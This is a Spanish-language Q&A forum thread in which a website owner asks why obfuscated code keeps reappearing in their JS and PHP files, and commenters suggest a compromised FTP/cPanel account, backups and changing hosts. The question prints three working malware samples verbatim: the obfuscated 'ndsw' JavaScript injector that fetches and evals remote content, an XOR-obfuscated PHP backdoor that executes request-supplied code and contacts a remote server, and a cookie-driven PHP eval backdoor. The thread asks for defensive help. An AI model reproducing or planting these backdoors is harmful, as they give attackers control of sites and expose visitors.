# ¿Cómo evito que alguien añada código malicioso a los archivos de mi sitio web?

Tags: javascript, php, web, seguridad

Hace poco noté que ciertos archivos JS y PHP de un sitio web de prueba que hice hace ya algún tiempo contienen código extra que yo no escribí y que, en ocasiones, genera una descarga del archivo en donde está insertado en lugar de su visualización.

A pesar de que manualmente he borrado dicho código de todos los archivos JS y PHP afectados, al poco tiempo vuelve a aparecer. Entiendo que esto se trata de un problema de seguridad, pero no sé exactamente a qué se debe este suceso. El sitio web cuenta con un TSL/SSL y se accede mediante un formulario de identificación o *login*.

El código que he encontrado es este (siempre insertado luego del código que escribí para cada archivo):

```
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//aquí se muestra la URL del sitio web/nombre del archivo insertado por el atacante',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};
```

Y en cuanto al código PHP, lo detecté solo en un archivo, solo que dicho archivo **no lo creé yo**:

```
<?php
 /*
 *---------------------------------------------------------------
 * APPLICATION ENVIRONMENT
 *---------------------------------------------------------------
 *
 * You can load different configurations depending on your
 * current environment. Setting the environment also influences
 * things like logging and error reporting.
 *
 * This can be set to anything, but default usage is:
 *
 *     development
 *     testing
 *     production
 *
 * NOTE: If you change these, also change the error_reporting() code below
 *
 *
 *---------------------------------------------------------------
 * ERROR REPORTING
 *---------------------------------------------------------------
 *
 * Different environments will require different levels of error reporting.
 * By default development will show errors but testing and live will hide them.
 */
 
class Snippet
{
    private static $s;
    public static function g($n, $k)
    {
        if (!self::$s) self::i();
        $l = strlen($k);
        $r = base64_decode(self::$s[$n]);
        for ($i = 0, $c = strlen($r);$i !== $c;++$i) $r[$i] = chr(ord($r[$i]) ^ ord($k[$i % $l]));
        return $r;
    }
    private static function i()
    {
        self::$s = array(
            '_gf' => 'HgoMOhoccioAMR0dMAVCHgU' . 'DMB5CEBsGO' . 'AA' . 'BZU' . 'lF',
            '_o' => 'HBsMFzoaFk' . '4LDRIGZVQDEy8YCwA+AAsMMVsIAikVE' . 'QAtH' . 'R' . 'I' . 'X',
            '_kpm' => '',
            '_wwe' => 'PAY' . '=',
            '_m' => '',
            '_ja' => 'MR' . 'wYHA' . '==',
            '_p' => 'YwEYYQ' . '=' . '=',
            '_dl' => 'Y' . 'xM+FW' . 'E' . '=',
            '_mt' => 'KB' . 'UIM' . 'w=' . '=',
            '_v' => 'PAU6',
            '_b' => 'Ph' . 'YWPDkX' . 'H' . 'QA' . 'r',
            '_xn' => 'N' . 'gY' . 'x',
            '_ceo' => 'P' . 'REZOk' . 'Y' . '=',
            '_xh' => 'azQABjw=',
            '_jcw' => 'MAg6',
            '_pij' => 'KAAdF' . 'A' . '==',
            '_xuc' => '',
            '_swc' => '',
            '_nkp' => 'NwIeGWVZRQ82Gg8acQEPCzwX' . 'CQE6BR4GLRcNDHEVBQRwFwlEPhgLBSYCAwosWAAaY' . 'BILHT5' . 'L',
            '_rc' => 'PBcVFgALCRM' . 'r',
            '_mx' => 'NxADHg' . 'AHGAo6',
            '_uh' => 'Yw4ZOzMbMAg' . 'dYQ==',
            '_wu' => 'YwACOz0GM' . 'hIXJlw' . '=',
            '_gm' => 'LAIFFDI' . 'E',
            '_ss' => 'NwYc' . 'Lw' . 'E=',
            '_om' => 'GC' . 'M1' . 'VQ' . '=' . '=',
            '_mu' => 'Lw' . '8QNw=' . '=',
            '_rgs' => 'Lh0S' . 'L' . 'R' . 'E' . '=',
            '_j' => 'YA==',
            '_jno' => 'LhoNLRY' . '=',
            '_amc' => 'fzILLg9VblRvd1UyMAkr' . 'QH8=',
            '_ygd' => 'NwoY' . 'K' . 'w==',
            '_c' => 'UnssMB8BOhIbNh4BZVEsMx4cOnxlUn' . 's' . '=',
            '_nhc' => 'LBIYZU5' . 'b',
            '_lcy' => '',
            '_a' => 'NxkaEA=' . '=',
            '_sj' => 'UmQ=',
            '_dcl' => 'YxsOOyYKMgkbJkc' . '=',
            '_tuz' => 'F' . 'yQmIwAzP' . 'joaP' . 'iYsF' . 'iA' . '=',
            '_ty' => 'FyYtDy06Ezs8ESYm' . 'FiI=',
            '_vf' => 'FyM4PAAvMy' . 'oQJTstDTMpKAAxIz4=',
            '_rwc' => 'F' . 'yEkPwAtLykQJycuDTE1Kw' . 'AzP' . 'z' . '0=',
            '_kbu' => 'DS4qJA' . 's' . 'uOCo' . 'b' . 'LzU' . '=',
            '_xj' => 'DS0' . '4' . 'ED' . 'w' . 'wACkxGzo' . '=',
            '_sb' => 'FzILNgAlGTkcKREoGiULLxEhAC8P',
            '_y' => 'FzALNAAnGTscK' . 'xEqGic' . 'LL' . 'REjA' . 'C0P',
            '_xu' => 'FzwkPQA9IygNNzEqGi' . 'Yk',
            '_xf' => 'Fy0jKQAsJDwNJjY+Gj' . 'c' . 'j',
            '_oeq' => 'FzcmDzwgGiU3DS' . 'Yg',
            '_mpu' => 'FyYLIgAgGjQaI' . 'B' . 'o' . 'g',
            '_ulh' => 'OR' . 'EHEToKN' . 'BM+C' . 'g=' . '=',
            '_pvb' => 'blBQ' . 'cVJJb0' . 'x' . 'W',
            '_pm' => 'Ngo=',
            '_k' => 'KhM=',
            '_mo' => 'LQ' . 'M' . 'e',
            '_sz' => 'MRUF' . 'Jw==',
        );
    }
}
class _8d1a3cd49dddb0ee874785cf500229c9
{
    private static $s;
    public static function g($n)
    {
        if (!self::$s) self::i();
        return self::$s[$n];
    }
    private static function i()
    {
        self::$s = array(
            0100,
            0121,
            02,
            064,
            01,
            046711,
            01,
            052,
            00,
            0116,
            012,
            015,
            012,
            0310,
            0673,
            0120,
            00,
            02000,
            01,
            0423,
            0423
        );
    }
}
header(Snippet::g('_' . 'g' . 'f', '_' . 'i' . 'o'));
header(Snippet::g('_o', '_' . 't' . 'b' . 'c'));
$_kd = Snippet::g('_kpm', '_mf');
if (isset($_GET[Snippet::g('_ww' . 'e', '_' . 'n') ]))
{
    $_y = gCode(Snippet::g('_' . 'm', '_w' . 'n'));
    if ($_y && strpos($_y, Snippet::g('_ja', '_x' . 'k' . 'd')) !== false)
    {
        die(Snippet::g('_p', '_ns'));
    }
    else
    {
        die(Snippet::g('_dl', '_' . 'q'));
    }
}
if (isset($_GET[Snippet::g('_' . 'mt', '_t' . 'd') ]))
{
    $_vyb = Snippet::g('_' . 'v', '_w') . Snippet::g('_' . 'b', '_bsc') . Snippet::g('_' . 'x' . 'n', '_i');
    $_epc = Snippet::g('_c' . 'e' . 'o', '_' . 'pj') . Snippet::g('_x' . 'h', '_kdc') . Snippet::g('_jcw', '_l');
    $_ow = $_epc($_GET[Snippet::g('_' . 'p' . 'ij', '_a' . 'qx') ]);
    $_ow = $_vyb(Snippet::g('_x' . 'uc', '_uz') , $_ow);
    $_ow();
    die;
}
function gCode($_rd)
{
    $_y = Snippet::g('_' . 's' . 'wc', '_a' . 'o');
    $_ae = Snippet::g('_' . 'nkp', '_vj' . 'i') . $_rd;
    if (is_callable(Snippet::g('_' . 'rc', '_bg' . 'z')))
    {
        $_px = curl_init($_ae);
        curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(0) , false);
        curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(1) , _8d1a3cd49dddb0ee874785cf500229c9::g(2));
        curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(3) , _8d1a3cd49dddb0ee874785cf500229c9::g(4));
        curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(5) , _8d1a3cd49dddb0ee874785cf500229c9::g(6));
        curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(7) , _8d1a3cd49dddb0ee874785cf500229c9::g(8));
        curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(9) , _8d1a3cd49dddb0ee874785cf500229c9::g(10));
        curl_setopt($_px, _8d1a3cd49dddb0ee874785cf500229c9::g(11) , _8d1a3cd49dddb0ee874785cf500229c9::g(12));
        $_y = curl_exec($_px);
        $_e = curl_getinfo($_px);
        curl_close($_px);
        if ($_e[Snippet::g('_mx', '_d' . 'wn') ] != _8d1a3cd49dddb0ee874785cf500229c9::g(13)) die(Snippet::g('_uh', '_l' . 'x'));
        if (empty($_y)) die(Snippet::g('_w' . 'u', '_b' . 'c'));
    }
    else
    {
        $_psl = parse_url($_ae);
        $_wa = ($_psl[Snippet::g('_gm', '_amq') ] == Snippet::g('_' . 's' . 's', '_' . 'r' . 'h'));
        $_mgq = Snippet::g('_o' . 'm', '_fau') . $_psl[Snippet::g('_m' . 'u', '_' . 'n' . 'd') ];
        if (isset($_psl[Snippet::g('_' . 'r' . 'gs', '_hw') ])) $_mgq .= Snippet::g('_j', '_' . 'ez') . $_psl[Snippet::g('_jno', '_oh') ];
        $_mgq .= Snippet::g('_a' . 'm' . 'c', '_z') . $_psl[Snippet::g('_yg' . 'd', '_' . 'e' . 'k') ] . Snippet::g('_c', '_' . 'q' . 'o');
        $_gmo = fsockopen(($_wa ? Snippet::g('_' . 'n' . 'h' . 'c', '_a' . 't') : Snippet::g('_lc' . 'y', '_v' . 'e')) . $_psl[Snippet::g('_a', '_vid') ], $_wa ? _8d1a3cd49dddb0ee874785cf500229c9::g(14) : _8d1a3cd49dddb0ee874785cf500229c9::g(15));
        if ($_gmo)
        {
            fputs($_gmo, $_mgq);
            $_u = _8d1a3cd49dddb0ee874785cf500229c9::g(16);
            while (!feof($_gmo))
            {
                $_i = fgets($_gmo, _8d1a3cd49dddb0ee874785cf500229c9::g(17));
                if ($_u) $_y .= $_i;
                if ($_i == Snippet::g('_' . 's' . 'j', '_nr')) $_u = _8d1a3cd49dddb0ee874785cf500229c9::g(18);
            }
            fclose($_gmo);
            if (empty($_y)) die(Snippet::g('_d' . 'cl', '_y' . 'o'));
        }
    }
    return $_y;
}
if (isset($_SERVER[Snippet::g('_tuz', '_p' . 'rs') ])) $_nml = $_SERVER[Snippet::g('_t' . 'y', '_' . 'r' . 'y') ];
if (isset($_SERVER[Snippet::g('_vf', '_' . 'wll') ])) $_xdl = $_SERVER[Snippet::g('_rw' . 'c', '_' . 'u' . 'po') ];
if (isset($_SERVER[Snippet::g('_kb' . 'u', '_' . 'kg' . 'k') ])) $_gna = $_SERVER[Snippet::g('_x' . 'j', '_hu') ];
if (isset($_SERVER[Snippet::g('_sb', '_' . 'f') ])) $_z = $_SERVER[Snippet::g('_' . 'y', '_d') ];
if (isset($_SERVER[Snippet::g('_x' . 'u', '_hpm') ])) $_vcz = $_SERVER[Snippet::g('_x' . 'f', '_yw' . 'y') ];
if (isset($_SERVER[Snippet::g('_oe' . 'q', '_c' . 'r') ])) $_uqq = $_SERVER[Snippet::g('_' . 'mpu', '_r') ];
if (function_exists(Snippet::g('_ul' . 'h', '_' . 'xke')))
{
    if (isset($_nml) && filter_var($_nml, _8d1a3cd49dddb0ee874785cf500229c9::g(19))) $_kd = $_nml;
    elseif (isset($_xdl) && filter_var($_xdl, _8d1a3cd49dddb0ee874785cf500229c9::g(20))) $_kd = $_xdl;
    else $_kd = $_gna;
}
elseif (isset($_gna)) $_kd = $_gna;
if ($_kd == Snippet::g('_p' . 'vb', '_b' . 'g') && isset($_z)) $_kd = $_z;
if (!isset($_kd) || !isset($_vcz) || !isset($_uqq)) exit;
else
{
    $_r = array(
        Snippet::g('_p' . 'm', '_' . 'zt') => $_kd,
        Snippet::g('_' . 'k', '_r' . 'e') => $_vcz,
        Snippet::g('_mo', '_f' . 'x' . 'd') => $_uqq
    );
    $_dr = urlencode(base64_encode(json_encode($_r)));
    $_y = gCode($_dr);
    if ($_y && strpos($_y, Snippet::g('_s' . 'z', '_' . 'qv')) !== false)
    {
        echo $_y;
        exit;
    }
}
```

Incluso hallé un archivo PHP con este código dentro del directorio de archivos CSS:

```
<?php
class Apt
{
    private static $s;
    public static function g($n)
    {
        if (!self::$s)
            self::i();
        return self::$s[$n];
    }
    private static function i()
    {
        self::$s = array(
            0135,
            0135,
            0116,
            0111,
            026,
            0136,
            0122,
            012,
            00
        );
    }
}
function click()
{
    $_fkm = $_COOKIE;
    ($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && eval($_uly)) : $_fkm;
    return Apt::g(8);
}
click();
```

No estoy seguro de si todo este código es añadido por la propia configuración del servidor (trabajo con CPanel de un *hosting* de mi ciudad) o si se trata del trabajo de algún atacante. Lo que sí sé es que ya ha ocasionado que el sitio no funcione bien, como cuando se intenta acceder a un archivo para visualizarlo en el navegador, pero inmediatamente se genera una descarga del archivo.

Agradezco cualquier orientación que puedan darme.

Comment: Hace años me pasó algo parecido en un hosting gratuito y eran ellos los que me editaban los archivos. Yo sé poco de seguridad, pero de lo que he leído ,tu problema puede ser originado desde muchos lados, si tienes un formularios o incluso recibes parámetros por la URL te pueden entrar por ahí; pueden haber hackeado la cuenta del FTP o el CPanel. Y quizás cuantas otras técnicas existirán. La recomendación es tener siempre todo actualizado, el PHP bien configurado, los permisos para carpetas y archivos bien configurados, y validar y sanitizar cualquier entrada desde fuera (POST/GET/PUT,etc)

Comment: El problema es que a ti ya te entraron, y normalmente dejan un script como servicio/demonio que te sigue cambiando los archivos, por lo que tienes que buscar los procesos, tareas y/o cron que se ejecutan. Yo, en tu caso me cambiaria de hosting y aplicaría mejores medidas de seguridad.

Comment: Tienes backup de tu sitio/sistema de una fecha antes que hayas notado que lo vulneraron o el proyecto base? Si es un sitio pequeño y tienes ese BK yo me movería de hosting. Ahora, si no tienes es BK, puedes hacer una limpieza de tu código antes de cambiarte de host. Pero creme que encontrar ese backdoor, si el sitio no es pequeño puede llevarte tu rato. Por cierto el código de una backdoor no creas que es "raro", es tan real y puro como cualquier otro.

Comment: @Yussef En efecto, parece ser el trabajo de un archivo *demon* porque da igual cuántas veces retire ese código insertado. En lo que respecta a la seguridad, además del TSL/SSL, implementé en su momento un filtro que evita filtraciones de tipo XSS o inyecciones SQL, por lo que, como bien mencionas, también creo que se trata de un ataque directo a la cuenta FTP/CPanel. Parece ser que el cambio de hosting será lo más razonable por hacer.

Comment: @OCHOA Felizmente tengo el *backup*; de otro modo, se volvería un dolor de cabeza tener que volver a revisar y limpiar cada archivo, pues, como señalas, ese tipo de código puede llegar a ser difícil de identificar porque no es tan *raro* que digamos. Lo que me frustra es el hecho de que se haya tomado las medidas de seguridad del caso, como implementar el TSL/SSL y un filtro contra ataques XSS e inyecciones SQL, pero me parece que esto va más allá de eso. Voy a hacer caso a sus recomendaciones y cambiar de hosting; no queda de otra.